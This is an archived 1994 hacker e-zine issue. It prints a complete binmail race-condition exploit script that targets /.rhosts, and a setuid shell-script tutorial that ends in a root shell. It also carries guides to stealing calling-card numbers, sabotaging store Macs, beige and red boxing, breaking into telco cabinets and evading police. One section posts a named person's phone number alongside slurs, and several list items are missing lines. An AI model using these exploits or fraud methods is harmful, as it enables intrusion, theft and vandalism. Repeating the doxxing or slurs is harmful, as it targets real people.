💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › MINDCRIME › mc-2.phk captured on 2022-06-12 at 13:14:50.

View Raw

More Information

-=-=-=-=-=-=-

 
 
 
       #     #         #     # ######   #####  ######          #     # #######
       ##   ##     #   ##    # #     # #     # #     #     #   ##   ## #
       # # # #     #   # #   # #     # #       #     #     #   # # # # #
       #  #  #     #   #  #  # #     # #       ######      #   #  #  # #####
       #     #     #   #   # # #     # #       #   #       #   #     # #
       #     #     #   #    ## #     # #     # #    #      #   #     # #
       #     #     #   #     # ######   #####  #     #     #   #     # #######
       
      -     -     -   -     - ------   -----  -     -     -   -     - -------
     -     -     -   -    -- -     - -     - -    -      -   -     - -    
    -     -     -   -   - - -     - -       -   -       -   -     - -    
   -  -  -     -   -  -  - -     - -       -----       -   -  -  - -----
  - - - -     -   - -   - -     - -       -    -      -   - - - - - 
 --  --     -   --    - -     - -     - -    -      -   --   -- -
-     -         -     - ------   -----  -----           -     - -------
                        
                                    Issue #2 
                               "Holy fux, Batman!"
                                   Dec 1, 1994
 
 =================================[MiNDCRiME]==================================
  MiNDCRiME Magazine is protected under Copywright laws of the United States 
  and  Europe. No portion of this work may be duplicated without the expressed 
  permission of the editor. MiNDCRiME Magazine may be distributed freely
  as long as the distributed copy is unaltered. Use of MiNDCRiME within any
  corporation whether private or government is subjected to a fee. E-Mail
  mndcrime@m-net.arbornet.org for information on commercial license.
 =================================[MiNDCRiME]==================================
 
 
 
  [Table Of Contents]
  
  File #1:
    b. Article submission information. 
    c. About articles that appear in MiNDCRiME.
    d. EDiTORiAL: IRC thoughts by h0wcum. (continued)
  File #2: Sendmail: the latest exploit by zomo.
  File #3: Beginner's Guide to Hacking continues with setuid stuff from 
                zomo.
  File #4: MiNDCRiME's Official Emmy Awards.
  File #5: eASE dROPPING aND cARDS by iP
  File #6: How to Mess up Department Store Macs By C-D and Walrus
  File #7: Phreaking, a Beginner's Guide by WyreTapp.
  File #8: Stealing Comic Books by kid Eternity
  File #9: Getting Even: the sequel your momma warned you about.
           b: Supplimental Toolz: Fake Mail + News
  File #10: News Flash: Hacker gets 20-month sentence. Courtesy Rerror.
  File #11: New sendmail hole?
 
================================[MiNDCRiME]================================ 
                               
                               Introduction  
                             
        Welcome to iSSUE #2 of MiNDCRiME. Things are rolling now, we are 
a little late with this issue because some of our authors are late 
sending in their articles. The initial reaction to MiNDCRiME has been 
mixed. There are people who say it rox, and there are ppl who say it sux. 
Nevertheless, I have been highly sought after since publishing the first 
issue.
 
MiNDCRiME is:
        h0wcum  : editor
        Valgamon: assistant editor. (welcome aboard!)
        iP      : global co-ordinator.
        oJ      : Staff dude
        Digital : Staff dude
 
        So here is the second issue. I hope everyone gets a little 
something from it. Enjoy and don't get caught.
 
================================[MiNDCRiME]================================
                          Submission Information
 
      If you would like to submit an article, email the article as well as your
  handle to: mndcrime@cyberspace.net. All submissions are subjected to 
  editing and rejection. We are currently looking for articles on:
 
  Easy systems,
  Hacker's sites, BBSs and FTP sites on the net.
  Unix hacking tutorials, src codes, bugs, shell scripts, etc.
  Recent information on Kevin Mitnick.
  Unix and general computer jokes.
  World hacking and phreaking news.
  Use your imagination.
 
  Direct all comments and questions to the address noted above.
  Direct all flames to /dev/null or my anus, whichever floats your boat.
==================================[MiNDCRiME]===============================
 
                           About Article Submission
 
        Some people have pulled me aside on IRC to tell me they thought 
certain submitted articles in issue #1 were lame. I'd just like to point 
out that the people who write for us put a bit of effort into their work 
and it isn't fair to shoot them down so quickly. I'd also like to add 
that if you hotshots think you can do better, you are *more* than welcome
to submit an article.
        Remember, next time it could be you they are saying wrote a lame
article. We try hard, Valgamon and I to put out the best magazine that we 
can. You can take your attitudes and put them where the sun don't shine. 
If you have some constructive criticism to offer, we will be happy to 
hear it, but if you want to cop an attitude with us, you can eat me.
 
================================[MiNDCRiME]===============================
 
                              Thoughts on IRC  
                                 by h0wcum
        
        As you all know #hack is +i. I'd like to start off this message 
saying that I intend no disrespect to any of those who have chosen to
make #hack invite only. This is merely my opinion, which is shared by
many, even those who choose not to gripe openly about it.
 
        For quite some time #hack has had its doors open to all who wished
to enter. That was the essence of the channel. The only time I have known
#hack to be invite only is when the channel has been taken over, and it
it appears now that it has been taken over for the final time, on a more
permanent basis.
 
        No one person, or small group of people own #hack. No one has the
right to make the channel invite only: it's like inviting or refusing
quests to someone elses' house. You have no right to make #hack +i. It's

one individual and supported by others. It is, however, contested by 
many, some of which who are ops, who have tried to make #hack -i and
ended up in a +i <--> -i war with len.
 
        Let's forget for a moment that you have absolutley *no fucking*
right to make any permanent descisions on the channel. Let's forget that you
have to be re-opped evertime you join #hack and that #hack does not
automattically role out the red carpet and op you when you join. Let's
examine, if you will, the inconvenience factor. 
 
        I usually get invited to #hack, that is, when ops are awake. Getting
into the channel at night or even at 8am is another story. Check it:
 
<-[len]-> invite #hack 

<-[mark]-> invite #hack 

<-[][ceman]-> invite #hack 
<-[y]-> invite #Hack 

<-[loq]-> invite #hack 

<-[ragent]-> invite #hack 

<-[gentry]-> invite #hack 

<-[loki]-> inite #Hack
        
        .... or my personally favorite circular reference:
        
<-[len]-> invite 

<-[mark]-> invite 

 
        As you can see, one has to fuck around for a time just 
to get an invite. You end up in a big circle of invite /msg's 
just to get into a channel that should be allowed in with no 
hassle.
 
        This is rediculous. I emplore those who are holding 
#hack hostage to take a fucking step back and realizee that 
you have exactly *squats* worth of authority to make it +i, 
especially when there are so many against it. len, you don't 
own #hack, I don't know who you are, but in all my time on 
#hack, I've just started to see you around in the last few 
months, unless you went by another nick.
        
       I don't wanna blow sunshine up anyone's ass, but I'd 
like to open this to a vote. If you are a non-op on #hack, send
e-mail to our address and explain your position on this. Also, I am
not trying to blow sunshine up anyone's ass, but this shit has got to end.
        
 
  
==================================[MiNDCRiME]===============================
                                    
 
  
=================================[MiNDCRiME]==================================
[FiLE #2:]
 
[Here's the latest binmail script. I don't know how many of you have it, 
but here it is. This is courtesy of zomo. ]
 
From zomo@narqlinq.net23.com Sat Oct  8 10:28:21 1994
Date: Sat, 8 Oct 1994 10:01:48 -0500
From: zomo@narqlinq.net23.com
 
#!/bin/sh 
# 
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts 
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson@galaxy.calpoly.edu>
# Minor Revisions by Chris Ellwood <cellwood@gauss.calpoly.edu>
# Thanks go to 8lgm for the basic script format.
 
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS
PROG="`basename $0`"
ME="`whoami`"
PWENT="`hostname` `whoami`"
 
cat > race.c << 'EOF'
 
#define TARGET "/.rhosts"
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
 
int main( ac,av)  int ac; char **av;
{
        unsigned int pid,bpid;  /* Some machines don't have pid_t */
        int i;
        char target[13];
        strcpy (target,"/tmp/maa");  
                /* General format for binmail temp names */
 
                if ((pid = fork())==0) { 
                   sleep (2);
                   nice (19);  /* Increase our chances and ... */
                   execl ("/bin/mail","mail",0); /* Fork binmail */
                }
 
        bpid=pid;  /* back up our pid for a later time */
 
        for (i=11;i>=8;i--) {
           target[i]=(pid%10) + '0'; 
                /* Make the name for the tempfile */
                pid /= 10;
        }
        while (!symlink(TARGET,target)) unlink (target); 
                /* Point that mktemp()'d file to the pot of gold */
        while (symlink(TARGET,target)) unlink (target); 
                /* Probably not necessary, but what the heck */
 
        kill(bpid,1);  /* Clean up, don't want to lag the system */     
}
 
EOF
 
cc -O -s -o race race.c
 
# Check we now have race
if [ ! -x "race" ]; then
        echo "$PROG: couldnt compile race.c - lame!"
        exit 1
fi
 
OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
NEW_TARGET_LEN=$OLD_TARGET_LEN
 
cp /usr/spool/mail/$ME /tmp/$          # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo ""  >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo ""  >> /usr/spool/mail/$ME
 
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
     ./race &
     RACE_PID=$!
     sleep 4
     NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
     kill -9 $RACE_PID
done
 
# We won the race
echo "Succeeded.."
# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/$ME
cp /tmp/$ /usr/spool/mail/$ME  
rm -f /tmp/$ race race.c
exit 0
 
=================================[MiNDCRiME]==================================
 
 
=================================[MiNDCRiME]==================================
[FiLE #3:]
[I'd like to remind folks that this is the "Beginner's" section. Most of
 you will know this. I don't need to hear colorful remarks about
 how "old" this is. -hc]
 
    "Why shell scripts with the set-user-id bit set aren't safe?"
                                by zomo
 
 Most shells will run as a login shell if the first character of their
argv[0] starts with a '-'. This is how login manages to give you a login
shell (check login.c). It calls csh as '-csh'. One of the things that a 
login shell does is read your .profile or .cshrc.
 
 On some systems, the shell is stupid enough to read and run $HOME/.profile
(or equivalent) even if it is running set-uid (effective uid != real uid).
 
 So, 
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x  1 root        51763 Nov 16  1993 setuid-shell-script
% cat > .profile << _EOF_
cp /bin/sh /tmp/fuck
chown root.wheel /tmp/fuck
chmod 4755 /tmp/fuck
_EOF_
% ln -s /usr/local/bin/setuid-shell-script -gotcha
% ./-gotcha
% /tmp/fuck
# 
 
 You got it! And there is another easy-to-exploit bug with set-uid shell
script.
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x  1 root        51763 Nov 16  1993 setuid-shell-script
% ln -s /usr/local/bin/setuid-shell-script -i
% ./-i
#
 Try it and think how it works (or it doesn't work ;) ).
 
 Now for the second security hole. It works on almost all #! systems.
Not only with shell scripts. When the kernel execs a file, it looks for
a magic number in the first two bytes ( try % man a.out ). If the magic
number is '#!', then it takes the next one or two tokens, execs file 
into which token parsed, with the full pathname of the script as an 
argument. ( get the kernel source of BSD unix and check exec.c )
So if /user/crash/dummies starts with:
 
#!/bin/sh
 then the kernel, in the process of loading this, would do:
execute "/bin/sh /user/crash/dummies". In other words, /bin/sh would
have /user/crash/dummies as argv[0]. If it was 
#!/bin/csh -f
 then the kernel would execs "/bin/csh -f /user/crash/dummies"
 
 The important thing to note here is that the shell re-opens the file
fo itself. The kernel does not pass an open file descripter to shell.
The race condition arises here.
 
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x  1 root        51763 Nov 16  1993 setuid-shell-script
% ln -s /usr/local/bin/setuid-shell-script hack-link
% cat > hack-commands << _EOF_
cp /bin/sh /tmp/fuck
chown root.wheel /tmp/fuck
chmod 4755 /tmp/fuck
_EOF_
% ./hack-link
 
 So the kernel stat()s hack-link. stat() follows the link and see the 
set-uid bit set with setuid-shell-script and the owner being root. So
the kernel sets uid to root (check exec.c, you can find this routine).
Then it executes the following command:
 
/bin/sh /user/danny/hack-link
with uid set to 0.
 The uid-zero shell opens /user/danny/hack-link. The open() follows the
link and opens the file at the other end (/usr/local/bin/setuid-shell-script)
and executes the commands from it. Still no security hole.
 But what if while the kernel was doing this, you did:
% rm mylink; ln -s /user/danny/hack-commands /usr/danny/hack-link
 Now when the kernel followed hack-link, 
it found /usr/local/bin/setuid-shell-script. So it set uid to 0. But the
time the /bin/sh follwed hack-link to open it, it find it was linked to
hack-commands, not /usr/local/bin/setuid-shell-script. So it execute 
hack-commands as root.
 
 Now you will almost certainly not win such a race with the kernel.
 
But you can increase the probability of win a race by increasing 
system load (i.e. execute X application, compute complex math problem)
and doing race with fast and optimized C program.
 
The moral of story: DO NOT SET-UID ANY SCRIPTS.
 
================================[MiNDCRiME]================================
[FiLE #4:]
                            MiNDCRiME Presents:
                            
                            Asshole of the Month
 
                           The Official Anus Emmy
        
                            Presented to: blootin
        
        Runner's up: Solctice, heretic, b1tchez.
        [Pretty soon, Solctice will be like Whitney, snagging 
         all the awards..]
         
================================[MiNDCRiME]================================
 
        _____                                                _____
        |_ _|                Roses are red,                  |_ _|
   n    (O O)    n          Violets are blue,           n    (O O)    n
   H   _|\_/|_   H       You fuxed with me, j00         H   _|\_/|_   H
  nHnn/ \___/ \nnHn       So fux yew, times 2!!        nHnn/ \___/ \nnHn
 <V VV /       VV V>                                  <V VV /       VV V>
  \__\/|     |\/__/                                    \__\/|     |\/__/
        
================================[MiNDCRiME]================================
 
                            MiNDCRiME Presents:
                             Narq of the Year        
 
                      The Official Trust Me Not Emmy
                          
                          Presented to: Skipjack
 
                Runners up: pX (email me for his inpho)
 
                        Hark! I am a narq!
                        
                        Of stark nature and poise,
                        I lurch silently amongst the noise.
                        
                        Your info, haveth I
                        Dick size, hair color and cbi
                        Watch me, j00, I am a spy!
                        
                        When u fux up, you will hear,
                        Skipjack narqed you out, sweet and dear.
 
                        Fux with me not,
                        For I shall narq,
                        Destroy your family, will I do
                        Just for fuxing with me on IRC, j00.
 
 
 
================================[MiNDCRiME]================================
 
                            MiNDCRiME Presents:
 
                            Fag of the Century
 
                        The Official Buttfuck.Com Emmy
 
                            Presented To: Solctice
 
                Runners up: no one, he won by a long shot.
 
 
    I don't even know where to begin. Why don't you call him yourself:
 
    Jim Reinknecht (Solctice) 908-832-6633
    
    [I know it's lame, but considering the numberous times he 
     put my info up on irc... Merry Christmas, fucker.]
 
================================[MiNDCRiME]================================
================================[MiNDCRiME]================================
[FiLE #5:]
 
             eASE dROPPING aND cARDS 
             y---[MiNDCRiME #2!]---y
              aRTICLE tYPED bY iP?!  
         _  _ _____ 12.o4.94 ]____ _  _ 
         
Every now and then, those of us who take the time to be
observant stumble across something remarkable.  Let me
relate to you one of those experiences.
It was an all too lazy sunny afternoon in Indiana.  I
was bored, and I decided to listen to my Realistic
PRO-2004 scanner.  I flipped it on and scanned through
the usual federal government, military aviation, and
cordless phone frequencies, but there was no action to
be found.  I happened to come across some scrambled DEA
transmissions and a droning cordless phone conversation
by some neighbors I could not identify.  So for a
change I decided to scan through the marine radio
channels.  The scanner then stopped on marine radio
channel 26, which is used to ship-to-shore telephone
calls.  A man was reading off his calling card number
to the operator, who gladly accepted and connected his
call.  Calling card numbers over the airwaves!  I was
shocked -- astonished that such a lack of security
could not only exist, but be accepted practice.
 
I began mointoring marine telephone to find out more,
and it turns our that using a calling card for billing
is commonplace on VHF marine radiotelephone. People use
calling cards for billing all the time.  That's what
the are for. But is it that big of a deal? [k0d3z!] 
You bet it is.  Marine telephone uses two frequencies,
one for the ship and one for the shore station.
[obviously]
The shore station transmits both sides of the
conversation at a some-what considerable power, enough
to offer reliable communications up to 50 miles
offshore.  Anyone with a standard police type scanner
costing as little as $100 can listen in.  People using
marine radiotelephonecan be broadcasting their calling
card number to a potential audience of thousands.
[k0d3z]  And that just shouldn't be happening, but it
is. [I won't complain]  And there is no doubt that
calling card fraud is occurring because of this lack of
security.
 
From the phone compant's [many Bell and non-Bell
companies provide marine telephone service] point of
view it must be a trade-off for customer convenience. 
You see, there just aren't that many ways to bill a
ship-to-shore call.  Most calls are collect, a few are
billed to the ship if they have an account, and a few
go to third party numbers [hehe] or other special
accounts. .. Sometimes the operators have trouble
verifying billing information.  I monitored one man,
who after racking-up $40 worth of AT&T charges was
informed that they couldn't accept his international
account number.  The operator finally coaxed him into
giving a address for billing.  Calls are often billed
to third party numbers with verification [hmm], but
calling cards make billing easy for both the customer
and the phone company involved.  It would also be
tricky for a company to not allow calling card use
[very tricky].  Doing so would be a inconvenience to
customers and would force them to admit a lack of
communications security.  Of course people using marine
radio should already realize that their conversations
aren't private, but announcing the fact wouldn't help
the phone compant at all.  In fact, people may place
less calls.
 
The convenience offered by calling cards makes them an
easy target for fraud. They can be used by anyone from
any phone and with a variety of different long distance
carriers via 10XXX numbers.  No red of blue box
hardware necessary here, just 14 digits, but of course,
the number won't be valid for long after all those
strange charges start showing up on someone's bill.  It
should be noted that when a calling cafd is used, the
number called, time and date of call, and location [and
often, the number] from which the call was placed are
printed on the bill.  A fraudulent user could be caught
via that information if they were careless.  Also, some
long distance companies may contact the owner of the
card if they notice and unusually high number of
charges on the card. .. Long distance companies bear
with the brunt of the bills caused by calling card
fraud.  However, if you read the fine print, the cards
offered by many companies have a certain minimum amount
that the customer must pay, say $25 or $50. [I have yet
heard of a case where a phone compant got away with
charging a customer when the only thing stolen was a
number and not the card itself]  .. So, whats the moral
of the story?  Simple.  Be damn careful what you say
over any radio, and that included cordless and cellular
telephones.
 
Also, be careful about how sloppy you are when using
cards.  If you are using a calling card, enter it with
touch tones. =)  If you happen to make VHF marine
radiotelephone calls, bill collect or charge to your
phone number as you would to a third party number --
without the last four calling card digits. For the most
part radio communications are easy to intercept, and
keeping them secure is up to you.  Then again, it gives
hackers and phreakers the cutting edge, and I must say
no one is in any situation to bitch or complain.
 
================================[MiNDCRiME]================================
[File #6:]
        
        [This is sortof an example of what NOT to send us. I posted this
    because the author was kind enough to send it and because it's kinda
    funny. In the future, folkx, please only send h/p related files. -hc]
 
 
                        How to mess up department store Macs
                              By C-D and Walrus
 
        Messing up department store Macs is a fun a wholesome activity 
        that can be enjoyed by the whole family. Some of these might 
        be to complicated to do in a store without people getting suspicious,
        but they are fun anyways. Here's some favorites!
 

        folder. This will screw up the system, and to boot you will need 
        a system disk.
 

        This makes the startup a very slow one, and could cause conflicts
 

        edited it with ResEdit, for example make the "Are you sure you 
        want to empty the trash?" dialog into something like "The gamma 
        correction buffer on this monitor has failed, please step away 
        from the monitor and seek help from a qualified technician".
        

        of a dialog box saying "Are you sure you wish to purge your ROM? 
        This process is irreversible" and have the cancel button grayed out. 
        A couple more you could try:
        

        empty when it contains files, and bulges when empties.
        

        STR# resources so that pointing to a window's Close box produces 
        a help balloon that says "click this box will cause 
        irreparable damage to the motherboard"
 

        alluring new menu command (like "Double Processing Speed") that 
        doesn't work.
 

        rendering the commands completely invisible. (they still work, 
        you just can't see them)
 

 

 

        menu contain the Format commands and vice-versa
 

        then hide the trash in the pattern.
 

        urging the user to restart the Mac immediately.
 

        much fun to watch them trash the whole hard drive.
 

 
        This will quit At-Ease and return you to the finder for your hours of
        wholesome fun. If you don't have a programmers button, you can also 
        try command power <the key in the upper right corner> which might 
        or might not work.
 

        (about3-5). Name them all .sony . Put one on the desktop, one in 
        the first HD window, one in the System folder. If you have any left,
        sprinkle them gingerly through the System folder. Restart, and the 
        Mac will attempt to use the files as Hard Drive Drivers. This can 
        completely corrupt the hard drive, its tons of fun.
 

        work very oddly.
 

        great to see the expressions on sales peoples faces.
 

        everything you type.
 

        the disk in, and then try to eject it, if it came out bend the 
        metal more and put it in again. This works like an arrow or fishhook, 
        it goes in but does not come out.
 

        button while the startup sound is playing, then leave the computer 
        sitting with the sad Mac.
 

        or red, or purple=8Apsychedelic!
        

        salespeople open the case to make sure the HD is really there.
 

        them with=spaces. Watch the clerks go nuts!
        
        If you want to get in touch with us, we are C-D and Walrus on IRC, 
        have phun...       :)
 
================================[MiNDCRiME]================================
==== Phreaking, a Begginers Guide
==== By: WyreTapp
==== Nov 25th, 1994
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
Disclaimer:  Every phile needs on of these. :(  I, Bud Wieser, and the
             contributors of this document are not responsible for any
             damages caused by the use of it.  In no way do we condone
             or encourage (hehe) you, the reader, to put this information
             into practice.
 
Intro.
-=-=-=-=-=
        Lame ass right?? Well FUCK YOU!  There have been tons of philes
written on boxing, but I felt like writing one too.  Its a good way to learn 
how to write, and you seem to remember everything quicker. So, im gonna
share my experiences with you readers, so that you too may cope with the
crude and harsh remarks from the city-boyz on the net.  Have fun, and enjoy.
All of this HAS BEEN DONE AND WORKS IN MY AREA.  I will not include a bunch
of theoretical BS that MAY work- only the real thing for the real peoplz.
 
Whats phreaking??
-=-=-=-=-=
        Good question.  Its the abuse of a phone system.  It usually involves
stealing from the phone company, or a person; resulting in lotsa phun.
        There are many branches of phreaking, with many sub-levels.  You 
will probably find that you cannot do everything in your area.  This is 
mainly because of new security features installed, and the wide-spread use
of the Digital Switching System.  You may want to phreak just for phun,
or, you may want to hack some local place without getting caught.  For
whatever reason, it never hurts to know. :)
 
Sounds phun- what do I do?
-=-=-=-=-=
        This is REALLY easy.  The first thing your going to want to do is
build yourself a tool known as a BEIGE BOX.  This is probably the MOST
usefull tool around (the Red Box MIGHT be in your area).  Before I go into
any depth, I will tell you how to make one
                You need
                ----------
                1 piece of phone cord (with a plug on each end)
                A set of wire cutters
                2 Alligator Clips (Of diffrent colors)
 
                Assembly
                ----------
                1) Grab phone cord in left hand.
                2) Grab wire cutters in right hand.
                3) Cut off the plug on one end of the phone cord.
                4) Attach the alligator clips to the RED and GREEN wires.
                   (May be BLUE and WHITE)
                5) Pour beer on cat.
                
        There ya go, a Beige box.  It should look something like this.
             >-.     ________________________,---.
       --->    `====`------------------------;___|  <--- Plug (Jack)
     Clips   >-'            ^Phone cord
 
        If you can't figure this out, stop reading, get a LONG peice of
rope, make a noose, tie it too a friends car, stick your head in, and tell
your friend to step on the gas.
        Now what- You got yourself this phone cord with alligator clips
on one end.  What will you do with it??  Read on.
        Get a phone.  The best kind is a hand-set that requires no base.
These are much eaiser to store, and can be connected/disconnected with great
ease.   Plug the JACK end of the Beige Box into the phone.  You now have 
a linemans handset.  
        
        
Where to use.        
-=-=-=-=-=
        
        The next step is too find a place to use your new toy.  Go outside 
and walk down the street.  See those telephone poles?  If you dont, then you
got yourself an under-ground wire.  These can be very difficult, or very
easy.  Look around for a man hole that has your telco's initials on it.
The man-hole will be slightly bigger than the others around it.  After you
have found it read on too the "Canning" section.
        
        If you do see telephone poles, try following them.  Remember that
the lower wires are CABLE and TELEPHONE.  The power lines SHOULD have an
insulator (a piece of ceramic) holding them away from the pole, so you should
be able to tell.
        Follow the lines until you see wires running off into someones house.
Follow the line RIGHT into their yard.  Check and see if it goes into their
roof.  If it does, then keep moving: If it goes down the side of their house
you just found yourself a "spot".    Most likely, you will find a Grey 
colored box, about 4"x4"x2".  Locate it, and push UP on it, to slide it
off.  Once you get it off, it should look similar to this (it may have
4 prongs which means it has may have 2 linez)
                          
                       ,-------------------.
                       |                   |
                       |      Bolts        |
                       |         |         |
                       |   __  <-'->  __   |
                       |  |  |       |  |  |
                       |  `--'--. ,--`--'  |
                       `--------|`'|-------'
                                |  |  <-- Main wire.
                                `  `
        Attach the RED alligator clip (from the RED wire of the phone cord)
onto the LEFT bolt, and the GREEN clip onto the RIGHT bolt.   You SHOULD
get a dial tone.  If you dont, then reverse the clips.  
        If the box has more than one set of bolts,  attach the clips to the
bolts that are on the same horizontal plane (Ie: Two top, or two bottom bolts   
 
     
not one top and one bottom)  Confuse you yet???  You'll figure it out.
        It is likely that you will find one of these on a phone pole.  If you
do, get ready for some fun, because that is probably a test line owned by
the phone company.  You can make all the calls you want, and never have to
worry about someone else picking up the line.
 
        Sometimes, on apartments, you will find a silver box about a foot 
long.  There are SHINY METAL (Not grey plastic).  You can open it by sliding
it to the right.  It will unlatch and spring open, revealing a staggered 
arangment of bolts, OR prongs.  It will look something like this.
 
                        ,------CASING-----------------.
                        |                             |
                        |       __                    |
                        |      |  |                   |
                        |  ,---`--' <--- Bolts        |
                        |  |               __         |
                      ____.'              |  |        |
          Main Wire-> ____'-------------- `--'        |
                        | `.                          |
                        |  `.__ __                    |
                       \|/     |  |                  \|/
        These can be a little tricky, because most of the time all of the 
prongs arnt used, and the telco guys are lazy.  Just keep trying combo's
until you get a tone.  You would think that you would just stagger your
way down, BUT Ive only seen ONE that was done like that. :(
        They are found often near the top of telephone poles.  It isnt 
really a good idea to go up there, because if someone catches you, you have     
 
   
no where to run.  Even if you live in the sticks, SOME COP is gonna drive by
and ask you what your doing (Trust me.. :(
        
        
Green Cans        
-=-=-=-=-=
        
        After you get the hang of those (they are your LAST resort), keep
following that phone line.  Eventually, you SHOUD come to a place where
that BIG line (on the phone poles) goes down into some pipes on the side 
of the pole and underground.  THIS IS WHAT YOU ARE LOOKING FOR!  Look around
for another place like this CLOSE by.  If you find it, somewhere around your
area is a "Mother Load" or "Green Can".  It may be underground.  As mentioned
before, look around for the man hole with the Telco's initials on it.
        The mother load is usually a grey-green in color, though I have seen
grey ones.  They look ALOT like swing-open filing cabinets.
        
        Now, get out your 7/16" wrench (Good thing you read the WHOLE text
file before you went out) and twist the bolts on the silver hands 
counter-clockwise (There are arrows printed on the silver handle).
        
        Got it open?  Awesome 'eh? (Yes, Im Canadian)  All those wires,
those white plastic bars, those wierd looking toolz hanging off the side 
of the doors, the instructions on how to use them...  Yes, the 
instructions.  Read them.  Write down any phone numbers written down on the
inside of the can.
        Look for a regular phone jack.  They are USUALLY test lines.  A
source of worry-free amusement.  If one exists, use it.  Why bill someone
some money when you can do it too your telco.
        If there is no phone jack your going to have to use one of the tools.
Use the one on the left.  It looks really fuqing wierd.  Now randomly pick
out a plastice bar, and open it.  There should be tabs you press to have it
flip open.  You just opened a terminal. look at it terminal closely.  
You should be able to see bits of bare wire if you look at the slits on the 
top of it.  When you find one that has the wire in it, plug in the test tool.
There are two little spikes that fit into hole on the FRONT (not the top) of
the terminal, and you can slide the latch of the tool of the face of the 
terminal and hook it onto the back.
        Attach your beige box two the bolts at the base of the tool.  If you
dont get a dial tone, swith the alligator clips.  If still no tone, try 
another bank on the terminal.
        Before you go phreak-happy, GRAB THE WIRE.  There should be a spool
of wire somewhere in the can, usually resting in its own little stand.  
TAKE IT.  It is VERY VERY usefull.
 
General tips beige boxing.
-=-=-=-=-=
        This is what I want to stress.  How NOT to get caught.  
        Here are a few rules you should follow:
        ---------------------------------------
        1. Do everything suspicious late at night
        2. Keep away from noisy dogs
        3. Keep away from hot spots (lotsa cops)
        4. Keep away from party zones
        5. Keep quite
 
        You should be sure to wear a lighter colored shirt underneath
a darker colored shit.  That way, if you DO get seen, you can whip off
the dark shit, and appear to be a diffrent person.
        Remember that spool of wire you got?  Well, try running your 
connections away from civilization (across the road and down the ditch).
I ran over 400 meters of wire into the woods once, and had no connection
problems.  Be sure to watch out for cutting the line, and shorts (if you must
strip the wire in more than one spot)
        To make your life easier, try getting some heavey-duty clips with
wires hanging from them and a clip on the other end.  You can attach these
to your connection, so you can clip on without opening anything up later, 
and disconnect without having to go back to the site (just yank).
        If you get stopped by the police (on a routine stop), try and 
be REALLY polite.  Answer any questions the guy may have UNLESS it starts       
 
 
getting to the "I know Im caught" point.  Lie about your name of course.
If you are carrying a bag and he asks to see whats in it, SHOW him, but dont
take anything out of the bag.  Just open it so he can look in.  If he says 
something like "Would you come with me?", say "Sure.." and when he turns 
around RUN!!!  (A good reason NOT to drive directly to your site).
        Here is a little list of things you should get if your going to
get into phreaking.
        WyreTapps List o' Stuff
     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
        1. A friend.  Its always funner if u got a friend with you.
        2. Pliers, Wire cutters, 7/16" wrench, flash-light and a knife
           all attacked to a rope or something- so you dont have to dig
           for them.
        3. A back-pack.
        4. A spool of wire (the 300meter phone stuff from the can)
        5. A spool of little wire (for loose connections and tying)
        6. Extra alligator clips
        7. 4 Industrial strength clips with wires attached (you will find
           a use.)
        8. A hand-scanner (to scan the police channels.  Its nice to know
           if you've been caught early.)
        9. Walkie-Talkies.  Nothing expensive.  Just so you can communicate
           with your friend (ie: setting up a connection and a cop comes.
           Your friend is 200 meters away, and cant yell or you'll both
           get seen.)
        10. A binder, with paper and a pen attached to it.  Really nice to 
            have.
 
Red Boxing
-=-=-=-=-=
        A red box is something that plays the quarter sound.  Whenever          
 
 
you drop a quarter into a pay-phone, it makes a series of beeps which 
signals a quarter has been dropped in.  (There are dime and nickle sounds 2)
        You can make this sound without the quarter. :) But, alas- Most
telco's are smart and buy NEW payphones that have the ground check.  When
a coin is dropped into the phone, it grounds it so that the pay-phone knows
you dropped money in.  
        Before I tell you how to by-pass the ground test, heres how to make
a red box, the EASY way.  
        
        Get one of those halmark greeting cards, or talking pictures, or 
record-your-greeting christmas ornaments and record the tone
into it.
        How do you get the tone??  HAHAHA.  Remember your beige box? 
Look around the pay-phone for one of those little grey boxes or a phone-jack.   
 
     
Plug your beige box in, and drop a quarter into the pay phone.  The tone
will be played through your phone REALLY loud and clear.  Just record this
into your aparatus.
        Another way of doing the tone without a redbox, is to use your 
beige box as mentioned above, and put the ear-piece to the mouth-piece of       
 
 
another payphone.
        To bypass the ground check, just drop a nickle into the slot            
 
(which may sometimes be enough for local calls- no red-box needed), OR:
        Look at the mouth-piece.  Alot of holes in it.  Is there
a hole in the direct middle??  If so, drive a tack into it, and run a piece 
of wire from the tack to the hook (the thing that holds the phone up when 
you hang it up).  Hang-up the phone for about 2 seconds, and that will 
ground the phone so you can play your tones into your beige box, with a 
grounded phone. :)
        Sometime you can just ground the phone to make local calls, but Ive
only seen one phone that'll do that (in an OLD dorm).         
 
Conclusion
-=-=-=-=-=
        I was hopeing on writing some stuff on Calling Cards, how to
setup a teleconfrence (just dial 0 and ask for help) and Voice Message
systems but I think this article is long enough for now.  I ny next
article I will discuss the above and after that I will go into Unix Hacking.
Greetz to: Z0rpHix, Tonyhawk, Endlisnis, Wildman, QwikSilver, Dark and
           jUIcE.
================================[MiNDCRiME]================================
[File #8:]
 
[This is an example of what NOT to send. The article is nice, but it
 doesn't go with h/p. In the future please only send h/p related articles
 to us. Unless u have a really unusual how-to, send only h/p. -hc]
 
    ______________________________
   |[][][][][][][][][][][][][][][]|
   |[]                          []|
   |[]   /\                     []|
   |[]   \                      []|
   |[]    \TEALING COMIC BOOKS  []|
   |[]   \/                     []|
   |[]                          []|
   |[][][][][][][][]][[][][][][][]|
